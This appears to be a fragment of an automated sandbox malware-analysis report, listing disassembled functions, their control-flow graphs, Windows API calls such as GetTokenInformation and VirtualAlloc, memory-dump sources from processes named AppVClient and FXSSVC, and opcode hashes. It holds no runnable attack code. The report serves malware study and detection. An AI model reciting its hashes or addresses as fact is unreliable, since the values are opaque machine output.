                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1cc770854f46d6a2fd6e6bf2cd2c70ef60aadcd5409775c30b15825518003e9b
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35F0F62161CF0D85DB2C8638885937AAFC1B799339F653F1ED017C90D0FA258F019245
                                                                                                                                                                                                                                                                                                                                                                                          Function 00535D50 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 246 535d50-535d5b CreateThread 247 535c78 246->247 248 535d1f-535d45 247->248 249 535c7e 247->249 252 535d47 248->252 253 535cd4-535cea CreateThread CloseHandle 248->253 249->248 250 535c84 249->250 250->246 252->253 254 535cf0-535d4d 253->254 255 535d8b-535d92 253->255 258 535d94 254->258 255->258 259 535d9c 255->259 262 535cb3 258->262 263 535c2c-535c2f 258->263 261 535da5-535db6 call 5352d0 259->261 271 535c30-535c39 261->271 272 535dbc 261->272 262->263 264 535cb9-535cbd 262->264 266 535cc3 264->266 267 535d56-535d5b CreateThread 264->267 266->267 269 535cc9 266->269 267->247 269->267 271->264 279 535bf7 271->279 273 535dbe 272->273 274 535d7d-535d89 272->274 273->274 280 535d9b 273->280 274->255 274->258 279->264 281 535bfd-535c06 279->281 280->259 281->261
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1714083515.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_530000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f4931682015e03a4705fb37f05f9e14d80cd89e5e84453855b796240cce4b04d
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDB01201028FCE9900651B30044C1280F843F47638D743FAC9F734E8D3F8041F046320
                                                                                                                                                                                                                                                                                                                                                                                          Function 00535990 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 283 535990-53599b 285 535a33-535a61 call 569b00 283->285 286 5359a1 283->286 296 535a63 285->296 297 535ab4-535aba call 551080 285->297 286->285 288 5359a7-5359ab 286->288 292 5359b1-5359f3 call 562320 288->292 293 535a59 288->293 292->293 312 5359f5-5359fa 292->312 294 535a25-535a2d 293->294 295 535a5b 293->295 300 535a70-535a7b 294->300 301 535a2f 294->301 295->294 309 535a23 295->309 296->297 304 535a65 296->304 315 535a83-535a88 call 535df0 297->315 318 535a13 297->318 307 535a16-535a1e call 551470 300->307 308 535a7d 300->308 301->304 304->300 324 535a96-535ac2 307->324 308->307 310 535a7f-535a81 308->310 311 535a24 309->311 310->315 316 535a51-535a54 call 56233c 312->316 317 5359fc 312->317 325 535a8d VirtualAlloc 315->325 316->293 317->316 321 5359fe-535a02 317->321 318->315 323 535a15 318->323 321->316 323->307 324->311 327 535ac8 324->327 325->324 327->311 328 535ace 327->328 328->285
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1714083515.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_530000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1284135714-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b75983928c5a207224bb145576625ced25bace6745651d1b959a1b0e951be7d1
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF21DB2162DEC48FC76A932844D53752FA2B7D5326F983BDBD086C7192F9284D45F242
                                                                                                                                                                                                                                                                                                                                                                                          Function 00538245 Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 330 538245-538247 331 5382d2-5382d7 330->331 332 53824d-53824f 330->332 334 538306-538309 331->334 333 538251-538260 call 5672f4 332->333 344 538390-538393 333->344 336 53830b-538311 CloseHandle 334->336 337 53832e-538330 334->337 336->337 338 538332 337->338 339 5382dd-5382e3 337->339 338->339 341 538334 338->341 342 5383a3-5383a4 339->342 343 5382e9 339->343 345 53f524-53f52e 341->345 343->342 348 5382ef 343->348 346 538399 344->346 347 53827e 344->347 350 53f807 345->350 346->347 349 53839f-5383a1 346->349 347->336 351 538284 347->351 352 5382f0-53831c 348->352 349->342 353 53f8df-53f8e0 350->353 354 53f80d 350->354 351->337 364 538322 352->364 365 5381e5 352->365 357 5415a5-5415aa 353->357 354->353 356 53f813 354->356 359 53f81b 356->359 360 53f78f 356->360 362 5415ae-5415af 357->362 359->353 360->359 363 53f795 360->363 366 5415b2-5415b7 362->366 363->350 364->365 370 538328-53832c 364->370 367 5382a3-5382a5 365->367 368 5381eb 365->368 369 5415ba-5415c1 366->369 371 5382ab 367->371 372 5383f9 367->372 373 5382b2-5382bc 368->373 374 5381f1 368->374 375 5415c7-5415d2 369->375 376 541750-5417a2 call 5672f4 369->376 370->337 377 5382c5-5382c8 370->377 371->372 378 5382b1 371->378 372->331 384 5383ff 372->384 373->377 383 538357-53836f GetTokenInformation 373->383 374->373 380 5381f7-53828e 374->380 381 5415d4-5415d6 375->381 382 541620-541623 375->382 377->372 385 5382ce 377->385 378->373 393 53828f-538303 call 5672ec 380->393 388 541670-541684 381->388 389 5415dc-5415df 381->389 390 541625-541628 382->390 391 5416a0-5416b4 382->391 397 538376-53837b 383->397 384->345 392 5382d0 385->392 385->393 388->357 400 54168a-54168d 388->400 389->369 396 5415e1-5415f6 389->396 390->369 398 54162a-541636 390->398 394 5416f4-5416f5 391->394 395 5416b6-5416b9 391->395 392->331 392->393 393->334 422 53834f-538355 393->422 413 5416fe-54170c 394->413 401 54173a-54173b 395->401 402 5416bb 395->402 403 5416d2-5416d7 396->403 404 5415fc-541600 396->404 397->352 405 538381 397->405 406 5416dc-5416ec 398->406 407 541638-541640 398->407 409 541693-541697 400->409 410 54172f-541738 400->410 418 54173f-541740 401->418 411 5416bf-5416cd 402->411 403->362 412 541606-541618 404->412 404->413 405->352 415 538387 405->415 406->375 414 5416f2 406->414 416 541646-54165f 407->416 417 54170e-541727 407->417 409->411 410->418 412->366 421 541744-541748 413->421 414->376 415->344 420 538277-53827a 415->420 416->375 424 541665 416->424 417->375 423 54172d 417->423 418->421 426 538241 420->426 427 53827c 420->427 428 538212-53821a GetTokenInformation 422->428 429 538341 422->429 423->376 424->376 426->333 426->397 427->347 427->426 431 538220-538234 428->431 432 5383af 428->432 429->428 430 538347 429->430 430->407 433 53834d 430->433 439 5383d7-5383dd 431->439 440 53823a 431->440 432->333 435 5383b5 432->435 433->422 435->333 436 5383bb-5383ca 435->436 436->420 443 5383d0 436->443 440->439 442 538240 440->442 445 54b32e-54b330 442->445 443->420 448 5383d6 443->448 446 54b300 445->446 447 54b332-54b337 call 5672f4 445->447 452 54b302 446->452 453 54b2fd 446->453 447->446 454 54b339 447->454 448->439 455 54b305 453->455 456 54b2ff 453->456 454->446 457 54b33b-54b33f 454->457 458 54b322-54b32d 455->458 459 54b308-54b315 455->459 456->459 457->459 458->445 459->455 461 54b317 459->461 461->453
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1714083515.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_530000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e0a528c61446f6f3d32398ed7aeaa3e9dc6b304581cccc3629650e27fcc6044e
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60F0A43890DB419FDA2E8718946047AAFA0BF95710F59089AF446CB223CE149C05D352
                                                                                                                                                                                                                                                                                                                                                                                          Function 00538318 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 462 538318-53831c 463 538322 462->463 464 5381e5 462->464 463->464 467 538328-53832c 463->467 465 5382a3-5382a5 464->465 466 5381eb 464->466 468 5382ab 465->468 469 5383f9 465->469 470 5382b2-5382bc 466->470 471 5381f1 466->471 472 5382c5-5382c8 467->472 473 53832e-538330 467->473 468->469 474 5382b1 468->474 479 5382d2-5382d7 469->479 480 5383ff 469->480 470->472 478 538357-53836f GetTokenInformation 470->478 471->470 477 5381f7-53828e 471->477 472->469 481 5382ce 472->481 475 538332 473->475 476 5382dd-5382e3 473->476 474->470 475->476 482 538334 475->482 484 5383a3-5383a4 476->484 485 5382e9 476->485 488 53828f-538303 call 5672ec 477->488 490 538376-53837b 478->490 489 538306-538309 479->489 486 53f524-53f52e 480->486 487 5382d0 481->487 481->488 482->486 485->484 491 5382ef 485->491 492 53f807 486->492 487->479 487->488 488->489 506 53834f-538355 488->506 489->473 494 53830b-538311 CloseHandle 489->494 495 538381 490->495 496 5382f0-53831c 490->496 491->496 497 53f8df-53f8e0 492->497 498 53f80d 492->498 494->473 495->496 500 538387 495->500 496->463 496->464 507 5415a5-5415aa 497->507 498->497 502 53f813 498->502 504 538390-538393 500->504 505 538277-53827a 500->505 512 53f81b 502->512 513 53f78f 502->513 510 538399 504->510 511 53827e 504->511 515 538241 505->515 516 53827c 505->516 521 538212-53821a GetTokenInformation 506->521 522 538341 506->522 517 5415ae-5415af 507->517 510->511 518 53839f-5383a1 510->518 511->494 523 538284 511->523 512->497 513->512 520 53f795 513->520 515->490 519 538251-538260 call 5672f4 515->519 516->511 516->515 524 5415b2-5415b7 517->524 518->484 519->504 520->492 527 538220-538234 521->527 528 5383af 521->528 522->521 525 538347 522->525 523->473 526 5415ba-5415c1 524->526 530 541638-541640 525->530 531 53834d 525->531 532 5415c7-5415d2 526->532 533 541750-5417a2 call 5672f4 526->533 555 5383d7-5383dd 527->555 556 53823a 527->556 528->519 535 5383b5 528->535 540 541646-54165f 530->540 541 54170e-541727 530->541 531->506 538 5415d4-5415d6 532->538 539 541620-541623 532->539 535->519 542 5383bb-5383ca 535->542 544 541670-541684 538->544 545 5415dc-5415df 538->545 547 541625-541628 539->547 548 5416a0-5416b4 539->548 540->532 550 541665 540->550 541->532 549 54172d 541->549 542->505 569 5383d0 542->569 544->507 558 54168a-54168d 544->558 545->526 554 5415e1-5415f6 545->554 547->526 557 54162a-541636 547->557 552 5416f4-5416f5 548->552 553 5416b6-5416b9 548->553 549->533 550->533 572 5416fe-54170c 552->572 560 54173a-54173b 553->560 561 5416bb 553->561 562 5416d2-5416d7 554->562 563 5415fc-541600 554->563 556->555 564 538240 556->564 557->530 565 5416dc-5416ec 557->565 566 541693-541697 558->566 567 54172f-541738 558->567 575 54173f-541740 560->575 568 5416bf-5416cd 561->568 562->517 571 541606-541618 563->571 563->572 574 54b32e-54b330 564->574 565->532 573 5416f2 565->573 566->568 567->575 569->505 578 5383d6 569->578 571->524 579 541744-541748 572->579 573->533 576 54b300 574->576 577 54b332-54b337 call 5672f4 574->577 575->579 583 54b302 576->583 584 54b2fd 576->584 577->576 585 54b339 577->585 578->555 586 54b305 584->586 587 54b2ff 584->587 585->576 588 54b33b-54b33f 585->588 589 54b322-54b32d 586->589 590 54b308-54b315 586->590 587->590 588->590 589->574 590->586 592 54b317 590->592 592->584
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE ref: 0053830B
                                                                                                                                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE ref: 00538369
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1714083515.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_530000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleInformationToken
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3954737543-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3dee57248ede6318043f27e691cf95d22c374b88d3f65f1a554d3a661bf62b0a
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF0903880D741DBCA2E8A18D850536AFA0BF21750F6C0C59F446CB222CE24EC42E752
                                                                                                                                                                                                                                                                                                                                                                                          Function 005383E7 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 593 5383e7-5383e9 594 5382c5-5382c8 593->594 595 5383ef 593->595 596 5383f9 594->596 597 5382ce 594->597 595->594 598 5383f5-5383f7 595->598 599 5382d2-5382d7 596->599 600 5383ff 596->600 601 5382d0 597->601 602 53828f-538303 call 5672ec 597->602 598->596 605 538306-538309 599->605 603 53f524-53f52e 600->603 601->599 601->602 602->605 618 53834f-538355 602->618 606 53f807 603->606 608 53830b-538311 CloseHandle 605->608 609 53832e-538330 605->609 612 53f8df-53f8e0 606->612 613 53f80d 606->613 608->609 610 538332 609->610 611 5382dd-5382e3 609->611 610->611 615 538334 610->615 616 5383a3-5383a4 611->616 617 5382e9 611->617 622 5415a5-5415aa 612->622 613->612 619 53f813 613->619 615->603 617->616 621 5382ef 617->621 627 538212-53821a GetTokenInformation 618->627 628 538341 618->628 624 53f81b 619->624 625 53f78f 619->625 632 5382f0-53831c 621->632 626 5415ae-5415af 622->626 624->612 625->624 633 53f795 625->633 634 5415b2-5415b7 626->634 630 538220-538234 627->630 631 5383af 627->631 628->627 629 538347 628->629 636 541638-541640 629->636 637 53834d 629->637 662 5383d7-5383dd 630->662 663 53823a 630->663 640 538251-538256 call 5672f4 631->640 641 5383b5 631->641 664 538322 632->664 665 5381e5 632->665 633->606 635 5415ba-5415c1 634->635 642 5415c7-5415d2 635->642 643 541750-5417a2 call 5672f4 635->643 644 541646-54165f 636->644 645 54170e-541727 636->645 637->618 655 53825b-538260 640->655 641->640 647 5383bb-5383ca 641->647 649 5415d4-5415d6 642->649 650 541620-541623 642->650 644->642 653 541665 644->653 645->642 652 54172d 645->652 690 5383d0 647->690 691 538277-53827a 647->691 658 541670-541684 649->658 659 5415dc-5415df 649->659 660 541625-541628 650->660 661 5416a0-5416b4 650->661 652->643 653->643 666 538390-538393 655->666 658->622 677 54168a-54168d 658->677 659->635 672 5415e1-5415f6 659->672 660->635 675 54162a-541636 660->675 670 5416f4-5416f5 661->670 671 5416b6-5416b9 661->671 663->662 676 538240 663->676 664->665 678 538328-53832c 664->678 667 5382a3-5382a5 665->667 668 5381eb 665->668 673 538399 666->673 674 53827e 666->674 667->596 689 5382ab 667->689 679 5382b2-5382bc 668->679 680 5381f1 668->680 697 5416fe-54170c 670->697 692 54173a-54173b 671->692 693 5416bb 671->693 681 5416d2-5416d7 672->681 682 5415fc-541600 672->682 673->674 683 53839f-5383a1 673->683 674->608 686 538284 674->686 675->636 684 5416dc-5416ec 675->684 685 54b32e-54b330 676->685 687 541693-541697 677->687 688 54172f-541738 677->688 678->594 678->609 679->594 705 538357-53836f GetTokenInformation 679->705 680->679 695 5381f7 680->695 681->626 696 541606-541618 682->696 682->697 683->616 684->642 706 5416f2 684->706 700 54b300 685->700 701 54b332-54b337 call 5672f4 685->701 686->609 702 5416bf-5416cd 687->702 707 54173f-541740 688->707 689->596 703 5382b1 689->703 690->691 704 5383d6 690->704 698 538241 691->698 699 53827c 691->699 692->707 693->702 708 53828e 695->708 696->634 712 541744-541748 697->712 698->640 710 538376-53837b 698->710 699->674 699->698 713 54b302 700->713 714 54b2fd 700->714 701->700 720 54b339 701->720 703->679 704->662 705->710 706->643 707->712 708->602 710->632 715 538381 710->715 718 54b305 714->718 719 54b2ff 714->719 715->632 717 538387 715->717 717->666 717->691 721 54b322-54b32d 718->721 722 54b308-54b315 718->722 719->722 720->700 723 54b33b-54b33f 720->723 721->685 722->718 725 54b317 722->725 723->722 725->714
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1714083515.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_530000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e917dba9bb5271f23e08add5bfe1041b50bffb1db3bbf004e764ad072aad2a64
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7F05E38D1DB41DFCA3E8718D85093BAFA0BB65750F6C4899F446CB222CE24EC46E752

                                                                                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                          Execution Coverage:5.1%
                                                                                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                          Total number of Nodes:59
                                                                                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                                                                                                                                          execution_graph 3935 425d22 3936 425cd4 CreateThread CloseHandle 3935->3936 3939 425bbc 3935->3939 3936->3939 3937 425c2c 3938 425d56 CreateThread 3938->3939 3939->3936 3939->3937 3939->3938 3940 425d50 CreateThread 3939->3940 3940->3939 3946 4281e3 3950 4281e5 3946->3950 3947 428357 GetTokenInformation 3947->3950 3948 42830b CloseHandle 3948->3950 3949 428212 GetTokenInformation 3949->3950 3951 428220 3949->3951 3950->3947 3950->3948 3950->3949 3950->3951 3906 425d50 CreateThread 3910 425bbc 3906->3910 3907 425cd4 CreateThread CloseHandle 3907->3910 3908 425c2c 3909 425d56 CreateThread 3909->3910 3910->3906 3910->3907 3910->3908 3910->3909 3917 428201 3919 4281e5 3917->3919 3921 428220 3917->3921 3918 42830b CloseHandle 3918->3919 3919->3918 3920 428357 GetTokenInformation 3919->3920 3919->3921 3922 428212 GetTokenInformation 3919->3922 3920->3919 3922->3919 3922->3921 3866 4283e7 3869 4281e5 3866->3869 3867 42830b CloseHandle 3867->3869 3868 428212 GetTokenInformation 3868->3869 3870 428220 3868->3870 3869->3867 3869->3868 3869->3870 3871 428357 GetTokenInformation 3869->3871 3871->3869 3941 4258de 3942 4353f0 VirtualAlloc 3941->3942 3943 4258f9 3942->3943 3944 4281c0 3 API calls 3943->3944 3945 425907 3944->3945 3872 425b8f 3885 4353f0 3872->3885 3874 425baf 3890 4281c0 3874->3890 3876 425c2c 3877 425c85 3896 425990 3877->3896 3879 425dcd 3879->3879 3880 425c20 3880->3876 3880->3877 3884 425bbc 3880->3884 3881 425d56 CreateThread 3881->3884 3882 425cd4 CreateThread CloseHandle 3882->3884 3883 425d50 CreateThread 3883->3884 3884->3876 3884->3881 3884->3882 3884->3883 3886 4353f4 3885->3886 3887 43545e VirtualAlloc 3886->3887 3889 4353f6 3886->3889 3888 435460 3887->3888 3888->3886 3889->3874 3891 4281e5 3890->3891 3892 42830b CloseHandle 3891->3892 3893 428220 3891->3893 3894 428357 GetTokenInformation 3891->3894 3895 428212 GetTokenInformation 3891->3895 3892->3891 3893->3880 3894->3891 3895->3891 3895->3893 3897 425994 wcscpy 3896->3897 3898 425a23 3897->3898 3899 425a8d VirtualAlloc 3897->3899 3898->3879 3899->3897

                                                                                                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                          Function 004281C0 Relevance: 4.9, APIs: 3, Instructions: 375COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 0 4281c0-4281d8 1 4283bf-4283ca 0->1 3 4283d0 1->3 4 428277-42827a 1->4 3->4 7 4283d6 3->7 5 428241 4->5 6 42827c 4->6 10 428251-428256 call 4572f4 5->10 11 428376-42837b 5->11 6->5 8 42827e 6->8 9 4283d7-4283dd 7->9 12 428284 8->12 13 42830b-428311 CloseHandle 8->13 19 42825b-428260 10->19 15 4282f0-42831c 11->15 16 428381 11->16 17 42832e-428330 12->17 13->17 32 428322 15->32 33 4281e5 15->33 16->15 21 428387 16->21 23 428332 17->23 24 4282dd-4282e3 17->24 22 428390-428393 19->22 21->4 21->22 22->8 26 428399 22->26 23->24 25 428334 23->25 28 4283a3-4283a4 24->28 29 4282e9 24->29 30 42f524-42f52e 25->30 26->8 31 42839f-4283a1 26->31 29->28 34 4282ef 29->34 36 42f807 30->36 31->28 32->33 35 428328-42832c 32->35 37 4282a3-4282a5 33->37 38 4281eb 33->38 34->15 35->17 39 4282c5-4282c8 35->39 44 42f8df-42f8e0 36->44 45 42f80d 36->45 40 4282ab 37->40 41 4283f9 37->41 42 4282b2-4282bc 38->42 43 4281f1 38->43 39->41 46 4282ce 39->46 40->41 47 4282b1 40->47 51 4282d2-4282d7 41->51 52 4283ff 41->52 42->39 49 428357-42836f GetTokenInformation 42->49 43->42 48 4281f7 43->48 53 4315a5-4315aa 44->53 45->44 50 42f813 45->50 54 4282d0 46->54 55 42828f-428303 call 4572ec 46->55 47->42 56 42828e 48->56 49->11 61 42f81b 50->61 62 42f78f 50->62 57 428306-428309 51->57 52->30 60 4315ae-4315af 53->60 54->51 54->55 55->57 68 42834f-428355 55->68 56->55 57->13 57->17 64 4315b2-4315b7 60->64 61->44 62->61 65 42f795 62->65 67 4315ba-4315c1 64->67 65->36 69 431750-4317a2 call 4572f4 67->69 70 4315c7-4315d2 67->70 77 428212-42821a GetTokenInformation 68->77 78 428341 68->78 72 431620-431623 70->72 73 4315d4-4315d6 70->73 75 4316a0-4316b4 72->75 76 431625-431628 72->76 80 431670-431684 73->80 81 4315dc-4315df 73->81 85 4316b6-4316b9 75->85 86 4316f4-4316f5 75->86 76->67 82 43162a-431636 76->82 87 428220-428234 77->87 88 4283af 77->88 78->77 84 428347 78->84 80->53 83 43168a-43168d 80->83 81->67 89 4315e1-4315f6 81->89 90 431638-431640 82->90 91 4316dc-4316ec 82->91 93 431693-431697 83->93 94 43172f-431738 83->94 84->90 96 42834d 84->96 97 4316bb 85->97 98 43173a-43173b 85->98 101 4316fe-43170c 86->101 87->9 113 42823a 87->113 88->10 92 4283b5 88->92 99 4316d2-4316d7 89->99 100 4315fc-431600 89->100 102 431646-43165f 90->102 103 43170e-431727 90->103 91->70 107 4316f2 91->107 92->10 104 4283bb-4283bd 92->104 106 4316bf-4316cd 93->106 105 43173f-431740 94->105 96->68 97->106 98->105 99->60 100->101 108 431606-431618 100->108 109 431744-431748 101->109 102->70 111 431665 102->111 103->70 110 43172d 103->110 104->1 105->109 107->69 108->64 110->69 111->69 113->9 114 428240 113->114 115 43b32e-43b330 114->115 116 43b332-43b337 call 4572f4 115->116 117 43b300 115->117 116->117 123 43b339 116->123 121 43b302 117->121 122 43b2fd 117->122 124 43b305 122->124 125 43b2ff 122->125 123->117 126 43b33b-43b33f 123->126 127 43b322-43b32d 124->127 128 43b308-43b315 124->128 125->128 126->128 127->115 128->124 130 43b317 128->130 130->122
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1725543525.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_420000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6d8dc2a0fde4f354a37be8c7f3ddda7191e1edf099bbbfa4d306a22086f36063
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
